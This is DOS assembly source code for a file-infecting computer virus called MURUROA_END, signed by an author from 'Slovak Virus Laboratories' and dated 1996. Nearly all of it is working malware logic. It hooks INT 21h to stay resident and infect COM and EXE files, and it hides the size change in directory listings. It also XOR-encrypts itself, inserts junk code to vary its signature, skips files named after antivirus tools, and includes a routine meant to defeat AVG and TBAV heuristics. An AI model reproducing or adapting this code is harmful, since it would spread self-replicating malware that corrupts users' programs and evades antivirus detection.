;* This source was created by Blesk/SVL in 23.03.1996 *
;* (C) Blesk/SVL 1996/97 *
codes segment
assume cs:codes, ds:codes, ss:codes
org 100h
virlength equ end_vir-begin
mem_to_res equ 140h
jmp svir ; Jump to VIRUS
mov ah,4ch
int 21h
;============== UTIL TO restore infected program in memory ==================
call avg_fuck
pop es
push es
mov ax,es
add ax,10h
add [cs:((offset eps) - begin)+si],ax
add [cs:((offset ess) - begin)+si],ax
cmp byte ptr [cs:((offset com_exe) - begin)+si],'c'
jnz _exe_type
mov ax,[cs:((offset orig_instr)-begin)+si]
mov [cs:100h],ax
mov ax,[cs:((offset orig_instr)-begin+2)+si]
mov [cs:102h],ax
mov [cs:((offset eps)-begin)+si],cs
mov [cs:((offset epo)-begin)+si],100h
mov [cs:((offset ess)-begin)+si],cs
pop es
push es
push cs
pop ds
;================ UTIL TO try if is virus now in memory =====================
mov ax,1996h
int 21h
cmp ax,9619h
jz _instaled
;======================= UTIL TO get addr INT21h ============================
push bx
push es
mov ax,3521h
int 21h
mov word ptr [cs: (or_21-begin)+si],bx
mov word ptr [cs: (or_21-begin)+2+si],es
mov word ptr [cs: (org_21-begin)+si],bx
mov word ptr [cs: (org_21-begin)+2+si],es
pop es
pop bx
;===================== UTIL TO GET MEM FOR VIRUS ============================
pop es
push es
push ds
mov ax,es
dec ax
dec ax
mov es,ax
cmp byte ptr [es:10h],5ah
jz no_end1
_end2: jmp _end1
mov ax,[es:13h]
sub ax,mem_to_res
jc _end2
mov [es:13h],ax
sub word ptr [es:22h],mem_to_res
mov es,[es:22h]
pop ds
;===================== UTIL TO move virus in MEMORY =========================
xor di,di
push si
mov cx,virlength
repz movsb
pop si
;======================= UTIL TO INITIALEZE VIRUS ===========================
mov ax,2521h
push es
pop ds
mov dx,(_int21-begin)
int 21h
;=========== Pop and go to original ============
pop es
_p11: pop bp
_p21: pop ds
_p31: pop es
_p41: pop dx
_p51: pop cx
_p61: pop bx
_p71: pop ax
pop si
mov ss,[cs:((offset ess)-begin)+si]
push [cs:((offset eps)-begin)+si]
push [cs:((offset epo)-begin)+si]
;==================== Code to CALL and JMP to orig 21H ======================
db 9ah ; CALL xxxx:xxxx
or_21: dd 0
db 0eah ; JMP xxxx:xxxx
dw 0,0
;=============Cange DTA====================================
change_dta: pushf
push ax
push bx
push cx
push dx
push es
mov ah,2fh
call dos
mov dx,[es: word ptr bx+18h]
and dh,0c0h
cmp dh,0c0h
jnz not_inf_dta;
mov dx,[es: word ptr bx+18h]
and dh,3fh
mov [es: word ptr bx+18h],dx
sub word ptr [es: word ptr bx+1ah],virlength
sbb word ptr [es: word ptr bx+1ch],0
not_inf_dta: pop es
pop dx
pop cx
pop bx
pop ax
;=======find first via handle=============
ffvh: popf
call dos
jc ffvh2
call change_dta
ffvh2: retf 2
;======find first/next via fcb=============================
ffvfcb: popf
call dos
cmp al,00
jnz no_found
push ax
push bx
push cx
push dx
push es
mov ah,2fh
call dos
mov al,[es: word ptr bx]
cmp al,0ffh
jnz @ew
add bx,8
mov dx,[es: word ptr bx+18h]
and dh,0c0h
cmp dh,0c0h
jnz not_inf_dta2;
mov dx,[es: word ptr bx+18h]
and dh,3fh
mov [es: word ptr bx+18h],dx
sub word ptr [es: word ptr bx+1ch],virlength
sbb word ptr [es: word ptr bx+1eh],0
pop es
pop dx
pop cx
pop bx
pop ax
no_found: popf
Stupid_Tex_For_Now_: ; May be not 8)))
db ' I am in LOVE now... ZUZANKA B.B. in Slovakia <:)<8< '
; !!!!!!!!!!!!! here is my int 21h !!!!!!!!!!!!!
ffvh3: jmp ffvh
ffvfcb1: jmp ffvfcb
cmp ax,1996h
jnz _next
xchg ah,al
cmp ax,4b00h
jnz _infe
jmp _infect
cmp ah,4eh
jz ffvh3
cmp ah,4fh
jz ffvh3
cmp ah,12h
jz ffvfcb1
cmp ah,11h
jz ffvfcb1
jmp To_21
include files.inc
;============= Util to add virus to open file =====================
call end_file
push bp
push es
push ds
push di
push si
push cs
pop es
push cs
pop ds
mov cx,[cs: word ptr (num_reloc-begin)]
mov bx,(table_reloc-begin)
push cx
push bx
mov di,[cs: word ptr bx]
mov dl,[cs: byte ptr bx+2]
xor dh,dh
zt4: call DEADCODE
add di,2
dec dx
jnz zt4
pop bx
add bx,3 ;<= go to next position in TABLE
pop cx
dec cx
jnz R_continue
call rnd_byte
cmp al,0
jz rtyt
mov [cs:byte ptr (_value-begin)],al
mov di,(buff-begin) ; Move
xor si,si
xor dx,dx
mov ax,(end_c-begin) ; Crypt
mov bx,40h
div bx
mov cx,ax ; Count how much blocks
mov bx,40h
mov di,(buff-begin)
cccykl: mov al,[si] ; Crypt 1 40h block
xor al,[cs:byte ptr (_value-begin)]
mov [di],al ;
inc si
inc di
dec bx
jnz cccykl ; Loop to Crypt routine
push cx
push dx
push si
push di
call end_file
mov dx,(buff-begin) ; And Save that BLOCK
mov cx,40h
call write_file
call end_file
pop di
pop si
pop dx
pop cx
dec cx
jnz ccykl ; Last COMPLET 40h block
; yes => Crypt last few
cmp dx,0
jz _no_last_few
push dx
; bytes (les than 40h)
mov di,(buff-begin)
cykl: mov al,[si] ; Crypt block
xor al,[cs:byte ptr (_value-begin)]
mov [di],al ;
inc si
inc di
dec dx
jnz cykl ; Loop to Crypt routine
call end_file
mov dx,(buff-begin) ; And Save last uncomplet
pop cx ; BLOCK
call write_file
call end_file
mov cx,(buff-end_c) ; Copy decryptor
push cs ; to buff
push cs ;
pop ds ;
pop es ;
mov di,(buff-begin) ;
cld ;
repz movsb ;
call end_file
mov cx,(buff-end_c) ;
mov dx,(buff-begin) ; AND save it !!!!
call write_file ;
call end_file
pop si
pop di
pop ds
pop es
pop bp
;================ Util to mark infected file via date ================
mov ax,5700h
mov bx,[cs:( handle - begin )]
call dos
or dh,0c0h
mov ax,5701h
call dos
;===================== Data used by VIRUS ============================
EXE_HEADER: db 'MZ' ;header of exe file
lastpage: dw ? ;Bytes in last page
nopages: dw ? ;Count of pages
RELOC: dw ? ;Count of relocate items
HederSize: dw ? ;Heder size
MinMem: dw ?
MaxMem: dw ?
ReloSS: dw ? ;Initial SS
ReloSP: dw ? ;Initial SP
CeckSum: dw ? ;DOS 3.00+ not use it !!!!
StartIP: dw ? ;Starting IP
StartCS: dw ? ;Starting CS
OfsRelo: dw ? ;Relocation table's offset
OVRType: dw ? ;0=Main segment
nope : dw ?
pklite: dw ? ;PKLITE = PK sign .. Don't
;INFECT !!!!!
Old_21 : dd ?
Time : dw ?
date : dw ?
Handle : dw ?
virussize equ (offset end_vir)-(offset _virus)
com_exe : dw 'c'
_vypis: push ax
push dx
push cx
push ds
push cs
pop ds
mov ah,04
int 1ah
cmp dh,05h ; Month = 5 ???
jnz not_vypis
cmp dl,04h ; Day = 4 ???
jz y_vypis
cmp dl,08h ; Day = 8 ???
jz y_vypis
cmp dl,14h ; Day = 14 ???
jz y_vypis
jmp not_vypis
call beep
mov dx,(text1-begin)
mov ah,09h
call dos
call line ; 49 x Í
mov dx,(text2-begin)
mov ah,09h
call dos
call line ; 49 x Í
mov dx,(text3-begin)
mov ah,09h
call dos
call line ; 49 x Í
mov dx,(text4-begin)
mov ah,09h
call dos
call line ; 49 x Í
mov dx,(text5-begin)
mov ah,09h
call dos
mov ah,08
call dos
call beep
pop ds
pop cx
pop dx
pop ax
mov cx,49
lllll: mov dl,'Í'
mov ah,06h
call dos
loop lllll
beep :
push ax
mov ax,0e07h
int 10h
pop ax
; 0cdh - line
text1: db 13,10
db 0c9h,'$'
db 0bbh,13,10
db 0bah,' I have one mesage to all people on earth : ',0bah
db 13,10
db 0cch,'$'
text3: db 0b9h,13,10
db 0bah,' All French nuc. test`s was STOPED. But MURUROA ',0bah
db 13,10
db 0bah,' IS DEAD !!!!! I am a coder of HELL FIRE and I ',0bah
db 13,10
db 0bah,' BRING YOU >>>>>> FIRE <<<<<< By Blesk/SVL ',0bah
db 13,10
db 0bah,'NOTE: Name of this virus is [MURUROA_END] ',0bah
db 13,10
db 0bah,' By Blesk from Slovak Virus Laboratories at .SK ',0bah
db 13,10
db 0bah,' Real name of BOZA is BIZATCH.. STUPID A-VERS !!!',0bah
db 13,10
db 13,10
db 0bah,' My greet to: VYVOJAR,SVL,VLAD,SKIMS,40-hex,IR ',0bah
db 13,10
db 0cch,'$'
db 0b9h,13,10
db 0bah,' And to some my friends: DJ.Milan,DJ.Maros, ',0bah
db 13,10
db 0bah,' DJ.Babula(Baby),TINA-huhu,DURO,LACI,Duffy,Kaaa, ',0bah
db 13,10
db 0bah,' Stano ...and more... A zdravim Mira Trnku 8)) ',0bah
db 13,10
db 0c8h,'$'
db 0bch,13,10
db 13,10,'$'
;============== Utils to infect files !!!! ===========================
push ax
push bx
push cx
push es
push dx
push ds
call _vypis
call infect_files
pop ds
pop dx
pop es
pop cx
pop bx
pop ax
jmp _jmp_dos
; ======================= INT_24.INC By Blesk/SVL ========================
int24: dw 0,0
;============ Hook int 24h and store original vector =====================
push es
push ax
; ==================================================
xor ax,ax
mov es,ax
mov ax,[es: word ptr (24h*4)]
mov [cs: word ptr (int24-begin)],ax
mov ax,[es: word ptr (24h*4+2)]
mov [cs: word ptr (int24-begin+2)],ax
; ======== Check INT 24 vector =====================
mov ax,(INT_24-begin)
mov [es: word ptr (24h*4)],ax
push cs
pop ax
mov [es: word ptr (24h*4+2)],ax
; ======== Set new INT 24 vector ===================
pop ax
pop es
;============ UnHook int 24h and restore original vector =================
push es
push ax
; ==================================================
xor ax,ax
mov es,ax
mov ax,[cs: word ptr (int24-begin)]
mov [es: word ptr (24h*4)],ax
mov ax,[cs: word ptr (int24-begin+2)]
mov [es: word ptr (24h*4+2)],ax
; ======== Restore INT 24 vector =====================
pop ax
pop es
;==============================MY int 24h=================================
mov al,03
call Hook_24
call findstr
cmp byte ptr [cs:((offset nasiel_s)-begin)],0ffh
jz can_infect
jmp NoInfecting
call open_file
mov cx,4h
mov dx,((offset exe_header)-begin)
call read_file
cmp word ptr [cs:((offset exe_header)-begin)],5a4dh
jnz com_infect
call exe_infect
jmp clo_infect
com_infect: call infect_com
clo_infect: call close_file
call UnHook_24
call begin_file
jnc cic2
jmp cic
mov cx,4h
mov dx,((offset exe_header)-begin)
call read_file
jc cic
push cs
pop ds
mov ax,[ds:((offset exe_header)-begin)]
mov [ds:((offset orig_instr)-begin)],ax
mov ax,[ds:((offset exe_header)-begin+2)]
mov [ds:((offset orig_instr)-begin+2)],ax
call end_file
add ax,virlength
jc cant_infect_com
sub ax,virlength
mov bx,[cs:((offset handle)-begin)]
mov cx,0ffffh
mov dx,0fffeh
mov ax,4202h
call dos
mov dx,((offset exe_header)-begin)
mov cx,2
call read_file
cmp word ptr [cs: ((offset exe_header)-begin)],1111h
jz cant_infect_com
call end_file
push ax
call begin_file
pop ax
sub ax,3
add ax,(svir-begin)
mov [cs:((offset exe_header)-begin+1)],ax
mov al,0E9h
mov [cs:((offset exe_header)-begin)],al
mov cx,3h
mov dx,(offset exe_header)-begin
mov byte ptr [cs:((offset com_exe)-begin)],'c'
call write_file
jc cic
call end_file
jc cic
add ax,100h
mov [cs: word ptr (delta-begin)],ax
sub ax,100h
call add_to_file
call mark_file
mov cx,0ffffh
mov dx,0fffeh
mov ax,4202h
call dos
mov cx,2
mov dx,(offset buff)-begin
call read_file
cmp word ptr [cs:((offset buff)-begin)],1111h
jz cic
call begin_file
mov cx,20h
mov dx,(offset exe_header)-begin
call read_file
cmp word ptr [cs:((offset ovrtype)-begin)],0000
jnz cic
cmp word ptr [cs:((offset pklite)-begin)],'PK'
jz cic
mov bx,[cs:((offset reloSS)-begin)]
mov [cs:((offset ess)-begin)],bx
mov bx,[cs:((offset startIP)-begin)]
mov [cs:((offset epo)-begin)],bx
mov bx,[cs:((offset startCS)-begin)]
mov [cs:((offset eps)-begin)],bx
add word ptr [cs:((offset reloSS)-begin)],10h
add word ptr [cs:((offset minmem)-begin)],100h
add word ptr [cs:((offset maxmem)-begin)],100h
jnc NoCaryMem
mov word ptr [cs:((offset maxmem)-begin)],0ffffh
mov byte ptr [cs:((offset com_exe)-begin)],'E'
mov ax,virussize
mov bx,200h
xor dx,dx
div bx
add word ptr [cs:((offset nopages)-begin)],ax
add dx,word ptr [cs:((offset lastpage)-begin)]
xchg ax,dx
xor dx,dx
div bx
mov word ptr [cs:((offset lastpage)-begin)],dx
add word ptr [cs:((offset nopages)-begin)],ax
call end_file
push si
push di
mov di,dx
mov si,ax
mov ax,[cs:((offset hedersize)-begin)]
mov bx,10h
mul bx
sub si,ax
sbb di,dx
mov dx,di
mov ax,si
pop di
pop si
mov bx,10h
div bx
mov [cs: word ptr (delta-begin)],dx
add dx,(svir-begin) ; START at Svir
mov [cs:((offset startIP)-begin)],dx
mov [cs:((offset startCS)-begin)],ax
call begin_file
mov cx,1ch
mov dx,((offset EXE_header)-begin)
call write_file
call end_file
call add_to_file
call Mark_file
@44: ret
My_Favourite_paper_magazine: db ' I love PC Revue .... '
;### Here is located RELOC table to put dumb instruction ###
dw 38
dw dumb1-begin
db 5
dw dumb2-begin
db 23
dw dumb3-begin
db 9
dw dumb4-begin
db 3
dw dumb5-begin
db 6
dw dumb6-begin
db 16
dw dumb7-begin
db 7
dw dumb8-begin
db 3
dw dumb9-begin
db 3
dw dumb10-begin
db 9
dw dumb11-begin
db 1
dw dumb12-begin
db 3
dw dumb13-begin
db 32
dw dumb14-begin
db 4
dw dumb15-begin
db 5
dw dumb16-begin
db 5
dw dumb17-begin
db 15
dw dumb18-begin
db 8
dw dumb19-begin
db 3
dw dumb20-begin
db 4
dw dumb21-begin
db 8
dw dumb22-begin
db 6
dw dumb23-begin
db 1
dw dumb24-begin
db 1
dw dumb25-begin
db 2
dw dumb26-begin
db 13
dw dumb27-begin
db 3
dw dumb28-begin
db 3
dw dumb29-begin
db 3
dw dumb30-begin
db 3
dw dumb31-begin
db 3
dw dumb32-begin
db 3
dw dumb33-begin
db 3
dw dumb34-begin
db 3
dw dumb35-begin
db 3
dw dumb36-begin
db 3
dw dumb37-begin
db 3
dw dumb38-begin
db 3
;======================== FIND.INC Thanx to SVL ==========================
; ds:dx =>'c:\path\name.ext',0
push ax
push si
push dx
push dx ; ds:dx = ds:si
pop si
cmp byte ptr [si],'\'
jz lomitko
cmp byte ptr [si],0
jz end_name
inc si
jmp analiza2
pop ax
inc si
push si
jmp analiza2
pop dx
pop si
pop ax
; ds:dx =>'name.ext',0
;Procedre FINDSTR check if string at adress DS:DX contain some1 word from
; Input: DS:DX-> string
; Output: NASIEL_S =0 Contain Nasiel_s = FFh Not contain
FINDSTR1 proc near
jmp findstr2
mov byte ptr [cs:((offset nasiel_s)-begin)],0ffh
call analiza
push dx
pop si
mov di,(offset tab-begin)
findstr2:mov bp,si
compar0:mov cx,0
compar1:xor bx,bx
compar2:mov ah,byte ptr cs:[di+bx] ;AH= char from table
cmp ah,0 ; New word ????
jnz nextwor
cmp cx,0
jnz found
jz nextword
cmp ah,1
jz found_1
mov al,byte ptr ds:[si+bx] ;AL= char from checked string
; UpChar
cmp al,5bh ;Make upcase of chars
jns compar3
cmp al,41h
js compar3
or al,20h
cmp al,0
jnz next_w ;end of name ??? (try next)
cmp cx,0
jnz found
jnz nextword
inc bx
inc dx
inc cx
cmp al,ah
jz compar2
nextword:mov ah,cs:[di]
inc di
cmp ah,1 ;If it is last word then mark NOT contain
jz found_1
cmp ah,0 ;begin of new word ????
jnz nextword
jmp compar0 ;Yes check it !!!!!
mov byte ptr [cs:((offset nasiel_s)-begin)],0h
nasiel_s:db 0
Exe db ".exe",0
Com db ".com",1
Tab db "avg",0
db "fv386",0
db "turbo",0
db "fv86",0
db "td",0
db "stacker",0
db "toolkit",0
db "msav",0
db "vc",0
db "rex",0
db "virlab",0
db "vir",0
db "alik",0
db "guard",0
db "nod",0
db "tbav",0
db "tbdriver",0
db "clean",0
db "f-pro",0
db "avast",0
db "asta",0
db "tbscan",0
db "debug",0
db "cpav",0
db "tlink",0
db "vlad",0
db "nav",0
db "vshie",0
db "dizz",0
db "command",0
db "hiew",0
db "sswap",0
db "scan",0
db "tbclean",0
db "vsafe",1
SpecForMT: db ' For M.T.: Vivat Ziar nad Hronom.. 8)) Uz si rad ?? '
db ' RADAR v PC Revue 9/94 '
; Who is M.T. ??? It is Slovak A-Ver 8) and this was my MSG
; FOR him
; This procedure generates GARBAGE ( instructions which have no other purpose
; than to increase the variance of the code)
; G_TABLE.INC ==> table of destation adress and counts
last: db 0
DEADCODE proc near
push ds
push di
push si
push dx
push dx
pop si
and al,00011111b
cmp al,14 ; check range <0,13>
jnc again ; Index in table2
cmp al,[cs: byte ptr (last-begin)]
jz again
mov [cs:byte ptr (last-begin)],al
mov bx,table2-begin
mov ah,0
add ax,ax
push ax
pop si
add si,bx
mov bx,[cs: word ptr si]
mov [cs: word ptr di],bx
pop bp
pop si
pop di
pop ds
RND_BYTE proc near
in al,40h
rnd_byte endp
table2 :
db 088h,0ffh,089h,0c9h,088h,0c9h,021h,0d2h
db 089h,0c0h,088h,0c0h,088h,0e4h,089h,0dbh,088h,0dbh
db 088h,0edh,089h,0d2h,088h,0d2h,088h,0f6h,02ch,000h
;########Kill Heuristick in AVG (sometimes and in TBAV)##########
old_20: dw 0,0
dumb27: dw 3 dup(9090h)
mov ax,3520h
int 21h
dumb28: dw 3 dup(9090h)
mov word ptr [cs : (old_20 - begin)+si],bx
dumb29: dw 3 dup(9090h)
mov word ptr [cs : (old_20 - begin+2)+si],es
dumb30: dw 3 dup(9090h)
push cs
pop ds
dumb31: dw 3 dup(9090h)
mov dx,my_20-begin
add dx,si
dumb32: dw 3 dup(9090h)
mov ax,2510h
dumb33: dw 3 dup(9090h)
add ax,10h
int 21h
dumb34: dw 3 dup(9090h)
int 20h
mov dx, word ptr [cs: (old_20-begin)+si]
dumb35: dw 3 dup(9090h)
mov ds, word ptr [cs: (old_20-begin+2)+si]
dumb36: dw 3 dup(9090h)
mov ax,2520h
dumb37: dw 3 dup(9090h)
int 21h
dumb38: dw 3 dup(9090h)
_protector: jmp _protect1
int_8: dw 0,0
_value: db 0
;================(destruct instrucition at JAMP:)=========
mov ax,9090h
mov word ptr [cs : ((offset jjjj)-begin) + si],ax
decod1: db 0b9h
dw end_c-beg_c
push si
mov dl,byte ptr [cs: (offset(_value)-offset(begin)) + si]
cmp dl,0
jz decod7
xor [cs: byte ptr si+(beg_c-begin)],dl
inc si
decod6: db 49h
jnz decod4
pop si
mov al,20h
out 20h,al
dumb2: dw 23 dup(9090h)
mov ax,2h
push ax
dumb3: dw 9 dup(9090h)
pop es
mov bx,word ptr [es: 0]
dumb4: dw 3 dup(9090h)
mov ax,word ptr [es: 2]
dumb5: dw 6 dup(9090h)
mov [cs:((offset int_8)-begin)+si],bx
dumb6: dw 16 dup(9090h)
mov [cs:((offset int_8)-begin+2)+si],ax
push cs
dumb7: dw 7 dup(9090h)
pop ds
mov dx,((offset dec_8)-begin)
add dx,si
dumb8: dw 3 dup(9090h)
mov ax,word ptr [cs : ((offset jjjj)-begin) + si]
dumb9: dw 3 dup(9090h)
mov word ptr [cs : ((offset backup)-begin) + si],ax
dumb10: dw 9 dup(9090h)
mov word ptr [es: 0],dx
dumb11: dw 1 dup(9090h)
mov word ptr [es: 2],ds
dumb12: dw 3 dup(9090h)
dumb13: dw 32 dup(9090h)
jjjj: jmp jamp
mov dx,[cs:((offset int_8)-begin)+si]
dumb14: dw 4 dup(9090h)
mov ax,[cs:((offset int_8)-begin+2)+si]
dumb15: dw 5 dup(9090h)
mov word ptr [es: 0],dx
dumb16: dw 5 dup(9090h)
mov word ptr [es: 2],ax
dumb17: dw 15 dup(9090h)
mov ax,word ptr [cs : ((offset backup)-begin) + si]
dumb18: dw 8 dup(9090h)
call dumb26
mov word ptr [cs : ((offset jjjj)-begin) + si],ax
backup: dw 9090h
db 0beh ;Stands for MOV SI,xxxx
delta dw offset begin ;We'll put the data offset in.
push si
dumb1: dw 5 dup(9090h)
_p10: push ax
call dumb26
pop ax
call dumb25
push ax
dumb19: dw 3 dup(9090h)
call dumb25
_p20: push bx
dumb20: dw 4 dup(9090h)
call dumb25
_p30: push cx
dumb21: dw 8 dup(9090h)
call dumb26
_p40: push dx
dumb22: dw 6 dup(9090h)
call dumb26
_p50: push es
dumb23: dw 1 dup(9090h)
call dumb25
_p60: push ds
call dumb26
dumb24: dw 1 dup(9090h)
call dumb26
_p70: push bp
call dumb26
push es
push si
call avg_fuck
pop si
call _protector
jmp beg_c
dumb26: dw 13 dup(9090h)
dumb25: dw 2 dup(9090h)
jmp dumb26
dddddd: jmp dumb25
epo : dw ?
eps : dw ?
ess : dw ?
orig_instr : db 90h,90h,90h,90h
dw 1111h
codes ends
end startprog
;## This source was generated by ##
;## Blesk's Funky Generator by Blesk/SVL ##
;## I used FOG - Funky Op code Generator ##
;## THANX ...... ##